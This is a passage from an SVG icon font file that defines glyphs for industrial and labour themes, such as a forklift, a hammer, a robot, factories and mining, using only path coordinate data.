0-24-2-24-18-1-16 12-18 24-18 24 0 47 0 71 0 6 0 14 2 14-8 3-46-1-88-39-120-36-31-77-37-120-17-45 20-66 58-67 106-1 40 0 80 0 120z" />
<glyph glyph-name="fork-lift" horiz-adv-x="1000" unicode="&#xe99d;" d="M556 306s-38 361-181 361h-228v-333h-58c-59 0 0-206 0-206h36c2 51 45 92 97 92 52 0 94-41 96-92h119v1c0 57 46 103 103 103s103-46 103-103c0-6-1-13-2-19h37l-61 191c-56-31-61 5-61 5z m-184-12l-54 94h-117v225h165c48 0 74-67 88-124 9-36 37-166 39-195h-121z m168-73c-49 0-89-40-89-90 0-50 40-90 89-90s90 40 90 90c0 49-40 90-90 90z m0-142c-28 0-52 23-52 52s24 52 52 52 52-24 52-52-23-52-52-52z m-321 125c-47 0-85-38-85-85 0-47 38-85 85-85s85 38 85 85c0 47-38 85-85 85z m0-135c-27 0-49 23-49 50 0 27 22 49 49 49s49-22 49-49-22-50-49-50z m718 147c-4 10-15 16-25 12l-187-61-161 485c-4 10-14 16-25 12-10-3-15-14-12-24l168-504c3-8 10-13 18-13 2 0 4 1 6 1l205 68c10 3 16 14 13 24z" />
<glyph glyph-name="glue-oil" horiz-adv-x="1000" unicode="&#xe99e;" d="M821 440c-1-39-17-67-54-82-37-14-74-30-111-46-16-7-33-7-49-3-8 1-14 1-20-2-21-9-43-17-64-26-20-9-40-11-62-5-7 3-13 1-19-4l-35-26c-28-23-56-23-86-4-29 18-51 43-58 78-3 15 0 29 8 41 11 16 23 32 35 47 5 6 6 11 4 19-6 21-5 41 4 62 9 21 17 43 27 64 2 7 3 13 1 20-3 17-3 34 4 50 14 35 29 69 43 105 20 53 62 67 113 56 49-10 91-35 129-65 67-51 124-112 164-188 15-29 25-59 26-91z m-336-137c25-1 37 15 33 39-6 30-21 55-40 77-28 32-60 58-104 66-22 4-37-9-38-32 0-18 7-33 15-47 3-5 3-9-1-14-11-13-21-28-31-42-4-5-6-8 3-11 23-10 41-27 50-51 3-7 6-7 11-3 13 10 26 19 39 29 7 6 12 7 21 2 12-9 27-13 42-13z m131 108c0 7-1 14-2 20-21 73-69 121-138 146-39 14-79 7-95-44-3-7-2-9 6-11 15-3 29-9 43-16 61-36 108-84 126-155 1-4 2-6 7-5 33 6 53 31 53 65z m-220-386c-2-60-30-96-76-108-51-14-101 5-126 46-15 26-19 55-10 84 8 29 24 55 40 80 20 31 43 60 65 88 5 7 8 9 14 1 31-47 61-94 81-146 7-17 12-35 12-45z m-174 28c-9 1-13-5-15-12-7-27 0-51 14-73 2-4 6-6 9-8 13-8 25-3 29 11 3 13 0 25-8 35-8 10-14 20-13 33 0 10-7 14-16 14z" />
<glyph glyph-name="hammer-alt" horiz-adv-x="1000" unicode="&#xe99f;" d="M856 9c-20 32-40 64-60 97-67 108-135 216-202 324-5 7-8 16-15 22-26 22-52 44-77 66-4 3-7 3-11 0-21-13-41-26-62-39-5-3-7-7-6-12 6-31 12-62 17-93 2-10 5-18 11-26 24-39 48-78 73-117 45-73 91-147 137-220 20-33 40-66 61-98h5c2 1 4 4 7 5 40 25 79 49 119 74 10 6 10 6 3 17z m-373 569c-9 14-18 28-27 42-10 16-10 28 2 43 20 25 44 43 75 50 23 6 46 7 69 7 18-1 26 11 21 28-4 14-14 21-28 25-3 2-7 3-11 4h1c-116 31-194-16-194-16-39-19-74-45-111-67-4-2-3-5-1-9 3-5 6-11 9-16 4-5 2-7-2-10-11-6-21-13-32-19-15-10-15-11-25 5-1 2-2 3-3 5-3 6-7 6-12 3-23-15-47-29-70-43-6-4-6-7-3-13 10-14 19-29 28-44 14-22 28-44 42-67 2-3 4-8 10-4 24 16 49 31 74 46 4 3 4 5 2 9-3 5-6 10-10 15-4 6-2 9 3 12 14 8 27 16 40 25 5 3 7 2 11-3 14-23 28-46 43-69 3-5 6-7 11-3 28 18 57 35 85 53 6 3 6 6 3 11z" />
<glyph glyph-name="hammer" horiz-adv-x="1000" unicode="&#xe9a0;" d="M528 533c-25 6-48 15-72 22-22 7-34 1-40-22-10-37-18-74-28-110-16-57-32-113-50-169-18-56-38-111-58-167-13-35-28-70-42-105-8-23-2-35 20-42 24-8 48-14 71-24 30-11 41 4 47 27 15 61 29 121 47 181 9 31 19 62 29 93 10 31 20 62 30 92 21 59 45 117 68 175 9 21 9 41-22 49z m245 154c-18 3-37 8-56 8-25 1-47 10-66 27-46 41-103 59-163 65-43 4-83-6-121-24-49-24-97-51-145-77-2-1-4-3-6-5 2-1 2-1 3-2 22-11 44-12 69-1 29 14 59 24 90 33 49 15 67 1 66-50 0-17-1-33-2-51 11-4 23-8 35-12 30-9 60-19 90-29 7-2 10-1 15 6 9 14 19 27 31 38 21 18 45 19 69 3 8-6 15-14 24-20 10-8 21-15 33-21 8-4 15 0 18 9 10 28 19 56 27 84 3 10-1 17-11 19z" />
<glyph glyph-name="help-robot" horiz-adv-x="1000" unicode="&#xe9a1;" d="M154-87c-21 7-28 22-27 44 0 27 0 55 0 83 0 28 13 41 41 41 43 0 87 0 130 0 3 0 7-2 9 2 1 2-2 5-3 7-68 115-136 230-204 344-1 3-3 5-4 8 81-57 157-54 228 16 24-41 49-83 73-125 48-82 96-163 143-245 3-5 7-7 13-7 46 0 92 0 138 0 29 0 41-13 41-42 0-28 0-56 1-84 0-21-7-35-28-42h-551z m780 601c-3-14-12-23-24-30-52-30-103-61-155-92-21-13-37-10-53 9-20 26-41 52-62 78-3 5-7 6-12 6-21 0-41 0-62 0-19 0-31 9-35 28-1 6-5 5-8 5-41 0-82 0-123 0-12 0-24 0-36 0-7 0-8 1-6 8 11 28 14 57 10 87-2 11-5 22-9 31-3 7-2 9 5 9l155-1c7 0 12 1 14 10 3 15 16 24 32 24 21 1 41 1 62 0 7 0 10 2 14 7 20 25 40 49 59 74 7 9 15 16 26 20h14c6-3 12-6 19-10 50-30 99-60 150-90 12-7 22-15 25-30v-10c-3-6-4-12-9-17-13-12-29-14-46-3-43 26-87 52-131 78-5 4-9 4-13-2-22-27-43-54-65-81-3-4-4-7-4-12 0-16 0-32 0-49 0-4 1-8 4-12 22-27 44-54 65-81 4-6 7-6 13-2 44 26 87 52 131 78 9 6 19 9 30 6 15-3 22-14 26-27-1-3-1-6-1-9z m-740-56c-71-1-128 56-128 127 0 71 57 129 128 129 71 0 128-58 128-128 1-71-57-128-128-128z m0 202c-41 0-75-34-74-75 0-40 34-74 74-74 41 1 74 34 74 75 0 41-33 74-74 74z m0-110c-20 0-36 16-35 36 0 20 16 36 35 36 20-1 36-17 36-36 0-20-16-36-36-36z" />
<glyph glyph-name="industries-1" horiz-adv-x="1000" unicode="&#xe9a2;" d="M642-28c-13 44-26 87-38 131-3 12-8 16-20 16-50-1-100-1-150-1-93 0-187 0-281 1-15 0-20-5-24-19-8-34-17-69-28-103-7-22-10-44-10-67 0-14 4-17 18-17 75 0 151 0 227 0h270c9 0 18 0 27 0 5 0 11 0 10 7 0 17 4 35-1 52z m-447 352c58 0 115 0 172 0v0c58 0 116 0 174 0 7 0 17-4 15 11-10 62-17 124-7 186 2 17-6 19-20 19-108 0-216 0-324 0-15 1-19-4-20-19-1-28 10-54 6-82-5-32-6-66-12-99-2-16 4-17 16-16z m529 91c-23-1-46 0-68 0-24 0-47-1-71 0-9 0-14-1-12-13 5-50 12-99 22-148 2-9 4-13 14-13 41 0 82 0 124 0 9 0 12 3 11 12-9 49-13 98-6 148 1 10-3 14-14 14z m-214 196c36-7 71-17 107-26 90-22 144 52 147 130-2-2-4-4-5-6-1-3-3-6-4-8-23-34-53-51-94-47-26 2-50 10-74 17-31 11-62 19-95 18-70-4-116-48-126-118 12 10 21 21 34 28 35 20 72 20 110 12z m267-537c-16 13-45 2-64 3-24 0-43 0-62 1-12 0-15-2-12-15 11-47 35-90 30-140-1-9 5-10 12-10 40 0 80 0 120 0 10-1 12 2 13 13 3 30-10 56-17 84-6 22-6 51-20 64z m131 477c-30-43-56-53-107-40-26 6-51 17-77 21-67 12-125-27-132-91 44 34 65 40 120 29 29-5 57-14 86-20 60-12 119 43 110 101z m-337 155c23-7 46-17 69-22 33-8 65-4 89 25 19 22 27 49 27 79-3-5-7-9-10-13-35-39-61-46-110-27-20 7-39 13-60 17-53 11-93-11-115-66 37 27 74 20 110 7z m98-161c32 14 48 15 80 4 17-5 34-11 51-17 70-23 104 32 105 82-3-4-5-6-8-9-29-34-48-39-91-24-9 4-18 7-28 9-47 12-84 11-109-45z" />
<glyph glyph-name="industries-2" horiz-adv-x="1000" unicode="&#xe9a3;" d="M844 224c0 14-5 16-17 16-218 0-437 0-655 0-14 0-17-4-17-17 1-98 1-195 0-293 0-15 5-17 18-17 109 0 217 0 326 0 109 0 219 0 328 0 13-1 18 2 17 16 0 98 0 197 0 295z m-581-111h-5c-42 0-42 0-38 42 0 7 3 10 10 10 22 0 44-1 65 0 8 0 12-3 11-11v-1c2-40 2-40-43-40z m126 0h-9c-42 0-42 0-39 42 1 7 2 10 10 10 22-1 44-1 67 0 7 0 9-3 9-10 3-42 3-42-38-42z m116 0h-6c-41 0-42 1-37 43 0 7 3 9 9 9 23 0 46 0 68 0 7 0 10-3 9-9v-2c3-41 3-41-43-41z m119 0h-3c-41 0-41 0-38 42 0 6 1 10 9 10 22-1 45 0 67 0 7 0 11-3 10-10 0 0 0-1 0-1 1-41 1-41-45-41z m128 0c-12 0-25 0-38 0-8-1-11 3-11 11-1 41-1 41 45 41 10 0 20-1 30 0 10 0 12-4 12-13 1-39 1-39-38-39z m-197 368c1-69 1-139 0-208 0-11 4-13 14-13 39 1 77 1 115 1 39 0 77 0 116-1 11 0 14 3 14 14-1 69-1 137 0 206 0 10-3 14-14 14-77 0-155 0-232 0-10 0-13-3-13-13z m181-41c31 0 31 0 31-31v-1c0-31 0-31-30-31-32 0-32 0-32 32 0 31 0 31 31 31z m-3-94c4 0 7 0 11 0 24 0 24 0 23-24-1-12 5-28-3-36-8-8-24-3-37-3-21 0-21 0-22 32-2 31-2 31 28 31z m-98 94c31 0 31 0 31-32v-1c0-29 0-29-30-29-32 0-32 0-32 32 0 30 0 30 31 30z m0-94c3 0 5 0 8 0 25-1 26-1 24-27 0-2-1-4-1-6-2-30-2-30-33-30-29 0-29 0-29 32 0 31 0 31 31 31z m-182 283c-1 9-4 13-14 13-17-1-34-1-51 0-10 0-12-4-13-13-1-51-3-102-5-154h0c-2-67-5-134-7-201-1-10 2-14 13-13 23 0 46 0 70 0 23 0 21-5 20 22-1 51-3 102-5 152-3 65-6 129-8 194z m-225-369c28 1 55 1 82 0 10 0 13 3 12 13-3 72-6 144-9 216h1c-2 47-4 93-6 140 0 9-2 13-12 13-18-1-35-1-53-1-9 1-11-2-12-11-4-119-9-239-14-358 0-9 2-12 11-12z m96 442c11 2 22 3 34 4 46 4 67 33 58 82-2-5-3-7-4-10-6-22-19-33-42-35-10 0-19 0-29 0-44 0-75-33-74-78 20 27 26 31 57 37z m136-2c15 3 30 5 45 6 44 4 67 38 54 81-8-34-20-44-52-44-7 0-15 0-23 0-42 0-74-33-71-81 10 25 27 34 47 38z" />
<glyph glyph-name="industries-3" horiz-adv-x="1000" unicode="&#xe9a4;" d="M833 167c0 9-2 13-12 13-20 1-40 2-61 3-76 5-152 11-228 15-39 3-79 7-119 7-46-1-92-5-138-7-58-3-116-6-175-9-13 0-17-4-17-17 1-38 0-76 0-113 0-39 1-79 0-118 0-11 4-15 15-15 34-1 67-2 101-4 33-1 66-4 99-5 44-1 88-7 132-4 44 3 88 8 131 12 87 9 173 18 259 26 10 1 13 4 13 13-1 68-1 136 0 203z m-620-80c-1-8-4-11-11-11-23 1-45 1-68 1-1 0-3-1-4 0-14 9-3 23-6 35-2 6-1 12 8 12 13 0 26 1 35 1h10c39 1 39 1 36-38z m95-13c-13 0-25 1-38 0-9 0-11 3-11 11-2 43-3 43 40 44 15 0 30 1 45 2 9 1 11-1 12-10 2-47 2-47-48-47z m236 0h-16c-47 0-48 2-42 49 1 7 3 9 10 9 25-2 51-3 77-4 8 0 10-4 11-12 2-42 3-42-40-42z m118 3h-9c-40 0-39 0-36 39 1 7 3 10 10 10 23-1 47-2 71-2 6 0 9-3 9-10-1-1 0-1 0-2 1-35 1-35-45-35z m148 7c-1-6-3-7-8-7-11 0-22 0-32 0h-16c-23 0-24 0-24 23 1 26-2 22 22 22 11 0 21 0 31-1 28-1 33-8 27-37z m4 190c-113 20-225 42-338 63-20 3-41 11-62 9-96-11-192-23-289-34-42-5-42-5-42-47v-2c0-9 1-18 0-27-2-16 5-19 18-17s27 2 41 3c55 4 111 7 167 11 59 4 119 8 179 2 106-12 211-22 317-32 27-2 27-2 27 25 0 8-1 16 1 24 2 15-5 19-19 22z m-557 393c14-4 29-3 39 9 8 10 14 20 30 12 3-2 10 1 13 3 14 10 31-10 44 5 2-2 3-4 5-6 16-15 37-18 55-5 13 10 26 9 39 5 25-7 47 7 70 13 3 1 7 6 9 10 2 3 4 6 7 8 14 8 19 19 13 34-5 16-16 23-33 23-5-1-10-1-16 0-18 5-37 1-55 8-6 2-13-1-19-4-14-8-27-10-41 0-8 6-19 7-26 3-13-7-26-7-40-8-13-1-22 8-33 6-21 0-39-13-44-34-1-8-4-11-12-14-13-5-27-34-23-48 2-11 7-18 18-20z m-35-324c26 4 52 7 79 9 11 1 13 6 13 17-1 42-7 84-7 125s0 84 0 126c0 21-7 27-28 27-10 0-21 0-31 0-20 0-27-6-28-26l-3-147c-1-40-2-80-3-120 0-6-2-12 8-11z m398 131c1 0 1 0 0 0z m-20 154c-11 0-22 0-33 0-14 0-21-6-21-20-2-83-5-166-8-249 0-12 5-16 15-17 21-4 43-7 63-12 11-2 13 0 13 11 0 44-9 88-9 133h-1 1c0 45 0 90 0 135 0 13-6 19-20 19z m91-71c-12 0-18-5-18-18-2-69-5-138-7-207-1-8 1-12 10-13 18-3 36-5 53-10 16-4 17 2 17 15-1 34-1 68-1 103-3 29-7 58-5 86 2 50-7 44-49 44z m-123 102c0-9 5-13 14-16 10-3 21-2 27 7 12 17 29 9 44 12 12 2 26-2 38-10 8-4 17-1 24 4 7 5 14 7 21 5 16-4 31 0 46 3 14 2 37 24 37 36 0 13-11 24-26 25-13 0-26 0-39 3-10 2-18 3-28-1-9-5-19-7-29 1-6 4-13 5-19 1-9-5-18-6-28-5-6 0-11 0-17 2-14 6-33-3-38-18-2-8-5-13-13-17-11-7-14-20-14-32z m338-20c-21 5-44 9-65 6-13-1-25-5-38 2-4 2-11 2-15-2-6-4-13-3-20-4-9-1-16 4-25 4-12 0-21-6-26-18-3-7-6-11-13-16-10-6-13-18-12-29 0-8 7-12 14-14 11-2 20 2 27 10 2 3 2 7 8 7 20-4 42 8 62-8 6-4 17-2 23 4 6 6 14 6 21 4 25-5 46 2 64 21 10 11 9 30-5 33z" />
<glyph glyph-name="industries-4" horiz-adv-x="1000" unicode="&#xe9a5;" d="M904 195c0 88 0 176 0 265 0 11-2 15-14 15-128-1-256-1-385 0-11 0-14-4-13-15 0-49-1-99 0-148 0-14-4-18-17-17-122 0-243 0-364 0-11 0-16-2-16-14 1-118 1-235 0-353 0-11 3-16 15-16 178 1 356 1 533 0 13 0 15 4 15 16-1 33 0 66-1 99 0 12 4 15 15 14 17-1 33-1 49 0 12 1 16-2 16-15-1-33 0-65-1-97 0-14 4-17 17-17 45 1 90 1 135 0 14 0 16 5 16 17 0 89 0 177 0 266z m-460 14c32 0 32 0 32-32 0-29 0-29-31-29-32 0-32 0-32 31 0 30 0 30 31 30z m3-75c29 0 29 0 29-32 0-32 0-32-31-32-32 0-32 0-32 31 0 33 0 33 34 33z m-290 47c0 28 0 28 31 28 32 0 32 0 32-31 0-30 0-30-30-30-33 0-33 0-33 33z m0-79c0 32 0 32 31 32 32 0 32 0 32-32 0-32 0-32-32-32-31 0-31 0-31 32z m63-79c0-33 0-33-32-33-31 0-31 0-31 32 0 34 0 34 33 34 30 0 30 0 30-30v-3z m45-33c-30 0-30 0-30 31 0 35 0 35 35 35 28 0 28 0 28-32 0-34 0-34-33-34z m0 80c-30 0-30 0-30 30 0 34 0 34 34 34 29 0 29 0 29-31 0-33 0-33-33-33z m1 78c-31 0-31 0-31 31 0 30 0 30 33 30 30 0 30 0 30-30 0-31 0-31-32-31z m100 61c32 0 32 0 32-32 0-29 0-29-31-29-32 0-32 0-32 31 0 30 0 30 31 30z m32-107c0-32 0-32-33-32-30 0-30 0-30 30 0 34 0 34 33 34 30 0 30 0 30-32z m0-77c0-35 0-35-34-35-29 0-29 0-29 33 0 33 0 33 32 33 31 0 31 0 31-31z m46-35c-31 0-31 0-31 31 0 35 0 35 35 35 28 0 28 0 28-33 0-33 0-33-32-33z m100 415c0 6 3 6 8 6 21 0 42 0 62 0 7 0 9-3 9-9 0-12 0-23 0-34h0v-22c0-20 0-20-19-19-16 0-32 1-48 0-9-1-13 3-13 11 0 22 1 45 1 67z m79-290c0-8-3-11-11-11-19 0-39 1-58 0-8 0-11 4-11 11 1 11 1 21 1 32 0 10 0 21-1 31 0 8 4 11 11 10 20 0 39 0 58 0 9 1 11-2 11-10 0-21 0-42 0-63z m0 172c0-10 0-21 0-31 0-40 0-40-39-40-8 0-16 1-24 0-12-1-18 2-17 16 1 18 1 37 1 55-1 10 2 14 13 13 17 0 35 0 53 0 10 1 14-2 13-13z m34 50c0 22 0 43 0 65 0 7 3 9 11 9 19 0 39 0 59 0 8 0 10-3 10-10-1-11 0-22 0-33h-1c0-9 0-19 1-28 1-10-2-14-13-13-18 1-37 1-56 0-8 0-11 2-11 10z m13-37c18 0 37 0 55 0 8 1 12-2 12-11-1-20-1-41 0-61 0-8-2-12-11-12-20 1-39 1-58 0-9 0-11 4-10 11 0 11 0 21 0 31 0 10 0 20-1 30 0 10 4 13 13 12z m64-193c-9-9-26-2-39-3-37 0-37 0-37 38 0 12 0 24-1 36 0 8 3 11 11 11 20-1 40-1 59-1 7 1 10-2 10-9-1-10-1-21-1-35-1-11 6-28-2-37z m37 296c0 7 3 8 9 8 20 0 40 0 60 0 7 0 10-2 10-9-1-11-1-22-1-33h1c0-11-1-21 0-31 0-7-2-10-10-10-19 0-39-1-59-1-7 0-11 2-11 10 1 22 1 44 1 66z m79-288c0-9-3-11-11-11-20 1-39 1-58 0-7 0-10 3-10 10 0 11 0 22 0 33 0 10 0 20 0 30-1 10 3 12 12 12 18-1 37-1 55 0 8 0 12-2 12-12-1-20-1-41 0-62z m-4 104c-8-9-27-2-42-3-33 0-33 0-33 34v12c2 10-6 28 4 36 8 6 25 2 38 2 37 0 37 0 36-38 0-14 7-34-3-43z m-673 362c12 0 9-9 9-16 0-40 0-80 0-120 0-41 1-82 0-122 0-12 2-16 15-15 19 1 39 1 59-1 15-1 17 5 17 18-1 80 0 160 0 240 0 5-4 13 4 15 14 2 8 12 8 19 1 8 4 23-1 25-16 6-11 17-11 26 0 10-3 13-13 12-21 0-42 0-64 0-11 1-14-2-14-14 0-8 6-20-10-22-1 0-2-5-2-7-1-10 0-20 0-30 0-3-1-8 3-8z m392-94c83 1 166 1 249 1 36 0 36 0 36 36 0 11-4 13-15 13-45 0-90 0-136 0h-124c-30 0-29 0-30-30-1-17 5-20 20-20z m-292 231c14 1 29 0 43 3 32 7 56 36 52 67-19-24-31-30-64-35-14-2-28-4-42-7-31-6-47-36-35-69 6 28 19 39 46 41z m82-395c0-7-3-16 11-15 26 0 53 0 79 0 14-1 11 9 10 15-1 7 7 19-9 18-13 0-26 0-39 0-14 0-28 0-42 0-16 1-9-11-10-18z" />
<glyph glyph-name="industries-5" horiz-adv-x="1000" unicode="&#xe9a6;" d="M842 381c0 5 0 10-1 16-74-43-146-86-220-131v132c-9-5-16-9-22-13-64-37-128-73-192-111-10-5-14-6-14 8 1 13 1 27 1 41v75c-39-22-74-42-112-64 0 14-1 26-2 39-2 79-4 159-5 239 0 11-4 14-14 13-25 0-49 0-73 0-10 1-14-2-14-13 0-34-2-69-2-104l-14-575c0-20 0-20 20-20 216 0 431 0 647-1 14 0 17 3 17 17 0 151 0 302 0 452z m-469-302c0-8-2-10-9-10-37 0-73 0-109 0-7 0-10 2-10 10 1 18 1 36 0 54 0 7 3 9 10 9 18 0 36 0 54 0v0c18 0 36 0 54 0 9 1 11-3 11-11-1-17-1-35-1-52z m0 269c-64-36-127-73-192-110-5 16 1 24 14 31 59 34 118 68 176 102 4 2 8 4 12 6 3-13 3-22-10-29z m199-271c0-9-5-8-11-8h-53s-35 0-52 0c-9 0-12 3-12 11 1 17 0 34 0 51-1 8 2 12 10 11 37 0 73 0 110 0 6 0 10 0 9-8 0-19-1-38-1-57z m32 279c-64-36-127-73-190-110-2-1-4-1-6-2-2 10-2 17 7 22 63 36 127 73 190 110 2 1 4 1 6 2 1-9 3-16-7-22z m168-275c0-8-2-12-11-12-36 0-72 0-107 0-8 0-11 3-11 11 0 18 0 35 0 53 0 7 3 10 10 9 18 0 36 0 54 0v1c18 0 35 0 53 0 9 0 13-3 13-12-1-17-1-33-1-50z m54 274c-63-36-125-73-188-109-2-1-4-2-7-3-2 10-2 17 8 22 63 36 125 73 188 109 2 1 4 2 7 3 2-9 3-16-8-22z m-568 331c13 5 26 7 39 9 23 3 47 3 71 9 38 10 53 56 41 84-13-37-19-42-59-48-15-2-30-1-45-1-44 2-95-37-88-90 9 20 23 31 41 37z" />
<glyph glyph-name="industries" horiz-adv-x="1000" unicode="&#xe9a7;" d="M818 295c-29 1-28 1-29 30 0 2 0 4 1 6 1 11-3 14-14 14-55 0-110-1-165 1-14 0-18-4-18-18 1-31 1-30-29-31-11 0-16 2-14 14 2 11-3 14-14 14-27-1-54-1-81 0-11 0-17-3-15-15 2-12-5-12-14-13-10 0-13 4-13 14 1 20 0 40 0 62-99-29-195-57-292-84-11-3-9-10-9-16 0-115 0-230 0-345-1-13 4-15 16-15 51 0 102 0 154 0h531c8 0 17-2 17 12-1 120-1 239 0 358 0 8-2 12-12 12z m-568-316c0-4-3-7-6-7h-75c-4 0-7 3-7 7v67c0 3 3 6 7 6h75c3 0 6-3 6-6l0-67z m0 92c0-4-3-7-6-7h-75c-4 0-7 3-7 7v67c0 3 3 6 7 6h75c3 0 6-3 6-6l0-67z m0 91c0-3-3-6-6-6h-75c-4 0-7 3-7 6v67c0 4 3 7 7 7h75c3 0 6-3 6-7l0-67z m101-183c0-4-3-7-7-7h-74c-4 0-7 3-7 7v67c0 3 3 6 7 6h74c4 0 7-3 7-6v-67z m0 92c0-4-3-7-7-7h-74c-4 0-7 3-7 7v67c0 3 3 6 7 6h74c4 0 7-3 7-6v-67z m0 91c0-3-3-6-7-6h-74c-4 0-7 3-7 6v67c0 4 3 7 7 7h74c4 0 7-3 7-7v-67z m194-183c0-4-3-7-7-7h-83c-4 0-7 3-7 7v23c0 3 3 6 7 6h83c4 0 7-3 7-6l0-23z m0 57c0-4-3-7-7-7h-83c-4 0-7 3-7 7v22c0 4 3 7 7 7h83c4 0 7-3 7-7l0-22z m0 57c0-4-3-7-7-7h-83c-4 0-7 3-7 7v22c0 4 3 7 7 7h83c4 0 7-3 7-7l0-22z m0 57c0-4-3-7-7-7h-83c-4 0-7 3-7 7v22c0 4 3 7 7 7h83c4 0 7-3 7-7l0-22z m0 57c0-4-3-7-7-7h-83c-4 0-7 3-7 7v22c0 4 3 7 7 7h83c4 0 7-3 7-7l0-22z m139-228c0-4-3-7-6-7h-68c-4 0-7 3-7 7v67c0 3 3 6 7 6h68c3 0 6-3 6-6v-67z m0 92c0-4-3-7-6-7h-68c-4 0-7 3-7 7v67c0 3 3 6 7 6h68c3 0 6-3 6-6v-67z m0 91c0-3-3-6-6-6h-68c-4 0-7 3-7 6v67c0 4 3 7 7 7h68c3 0 6-3 6-7v-67z m94-183c0-4-3-7-7-7h-68c-4 0-7 3-7 7v67c0 3 3 6 7 6h68c4 0 7-3 7-6v-67z m0 92c0-4-3-7-7-7h-68c-4 0-7 3-7 7v67c0 3 3 6 7 6h68c4 0 7-3 7-6v-67z m0 91c0-3-3-6-7-6h-68c-4 0-7 3-7 6v67c0 4 3 7 7 7h68c4 0 7-3 7-7v-67z m-466 201c8 2 7 7 7 13l-5 80c-4 63-8 126-11 189-1 10-4 13-13 13-13-1-26-1-39-1-28 0-28 0-30-28-4-69-8-138-12-207-1-30-5-59-3-90 36 11 71 21 106 31z m334 2c15 0 29 0 44 0 13 0 26 1 39-1 16-2 18 5 17 19-6 86-11 172-15 257-1 9-3 12-12 12-19-1-37-1-56 0-11 1-13-4-13-13-1-29-3-58-5-87-3-58-7-117-11-175 0-10 3-13 12-12z m144 383c-14 4-28 7-42 6-37-2-65-37-59-73 17 36 35 45 73 37 9-1 17-4 26-6 54-13 97 16 100 70-29-42-46-48-98-34z m-448-25c10-3 20-6 30-8 46-8 85 23 87 73-12-34-35-43-66-40-16 2-32 6-47 9-56 14-88-26-85-70 20 37 38 45 81 36z" />
<glyph glyph-name="labour" horiz-adv-x="1000" unicode="&#xe9a8;" d="M936 5c-6 24-12 50-17 75-2 12-8 19-17 26-51 34-108 54-166 73-13 4-20 1-29-9-64-77-144-114-245-98-69 11-122 48-164 102-5 6-8 12-17 10-64-20-127-41-183-79-10-6-15-14-17-26-5-23-10-47-17-70-4-15 0-21 15-24 149-29 300-41 476-39 43 1 110 5 176 11 65 7 130 17 194 29 11 3 14 7 11 19z m-638 430c19 2 41 6 57-2 45-22 93-23 141-24 48-1 96-2 141 14 21 8 40 13 61 13 48-1 52 4 45 52l0 3c-1 7-5 12-12 12-13-1-13 6-14 15-5 66-32 122-81 167-17 16-44 23-52 50-2 3-7 8-12 6-5-2-3-8-4-12-3-34-6-69-8-104-1-12-3-24-18-24-17 0-16 14-16 27 2 35 2 71 5 106 1 22-13 17-25 18-13 1-21 0-20-18 2-38 2-77 3-115 0-9-3-18-13-18-11-1-17 6-18 16-2 17-3 33-5 49-2 25-4 51-7 77-16-10-17-9-22-22-2-7-6-10-12-14-71-43-106-108-112-190-1-9-1-15-13-14-10 0-13-6-13-15 0-10 1-19 0-28-2-18 5-26 24-25z m269 54c8 58 15 116 23 178 56-41 81-92 85-155 1-10-4-14-12-16-28-9-57-13-86-16-7-1-11 1-10 9z m-57 36c22 0 41-19 41-41 0-23-19-41-41-41-23 0-41 18-41 41 0 22 18 41 41 41z m-82 139c7-58 14-116 21-173 2-9-1-12-11-11-28 3-55 7-81 15-7 2-14 3-15 13-3 48 35 133 86 156z m-109-256c-13-2-34 11-35-16-1-30 7-58 32-76 12-9 18-19 24-32 30-79 96-127 169-127 17 0 33 2 49 7 61 21 99 66 122 125 3 9 4 17 14 23 25 14 35 38 39 65 3 27-1 31-28 32-13 0-20 0-17-18 3-19 3-39-26-42-10-1-15-12-17-22-4-19-12-37-21-53-38-66-108-92-170-60-45 23-69 63-81 110-3 10-6 23-17 24-28 3-28 22-28 42 0 8 9 21-9 18z" />
<glyph glyph-name="mining" horiz-adv-x="1000" unicode="&#xe9a9;" d="M894 532v34c-9-4-14-6-18-8-69-44-108-105-110-188 0-14 0-22-20-20-40 6-76-6-111-25-15-8-17-16-10-32 44-92-20-193-122-189-44 2-74-16-101-44-11-11-21-15-35-15-83 0-145-38-190-106-15-23-13-26 14-26 225 0 450 1 675 0 26-1 29 9 28 30 0 196 0 393 0 589z m-389-586c-21-1-37 15-38 35 0 22 14 37 35 38 22 0 37-14 38-36 0-20-15-37-35-37z m218 57c-24-1-42 17-42 40-1 25 18 44 42 43 24 0 41-18 41-42 0-23-18-41-41-41z m44 195c-17-1-29 7-31 25 1 19 12 30 28 31 17 2 28-9 29-28 0-17-10-27-26-28z m74 226c-11 1-17 8-17 18 0 12 7 19 19 19 11 0 18-7 18-19-2-12-9-19-20-18z m-187 81l5-1c37 67 74 133 111 200 33 59 32 59-34 81-14 5-20 3-23-12-11-53-23-105-35-158-8-36-16-73-24-110z m-109-266c-54 12-108 25-163 37-43 10-42 9-44-36-1-12 3-17 15-16 64 4 128 8 191 12l1 3z m-39-78c-24-1-48-2-71-3-19-1-19-1-14-20 1-5 3-6 8-5 25 9 51 18 77 27 0 0 0 1 0 1z m-62 312c-17 11-33 22-49 35-5 5-10 4-15-3-53-60-106-120-158-180-36-41-71-82-107-122-10-11-13-19 1-29 11-8 21-18 31-27 4-3 7-7 12-6 6 1 8 5 11 9l236 268 38 43c4 4 7 8 0 12z m205-20c-53 47-112 85-172 122-57 34-117 59-181 79-19 5-31 2-42-13-7-9-8-11 2-17 67-34 130-74 191-118 51-37 102-75 148-118 6-6 10-7 16 0 13 16 27 31 40 47 3 2 5 5 7 8-1 5-6 7-9 10z m-167 152c16-9 33-18 48-29 11-8 14 0 20 6 6 7 7 13-1 20-13 11-25 22-38 33-3 2-5 5-11 4-9-3-14-13-21-20-6-6-5-10 3-14z m366-18c15 13-3 18-9 24-4 6-11 18-20 3-22-32-45-64-67-97 1-1 3-3 4-4 31 24 62 49 92 74z" />
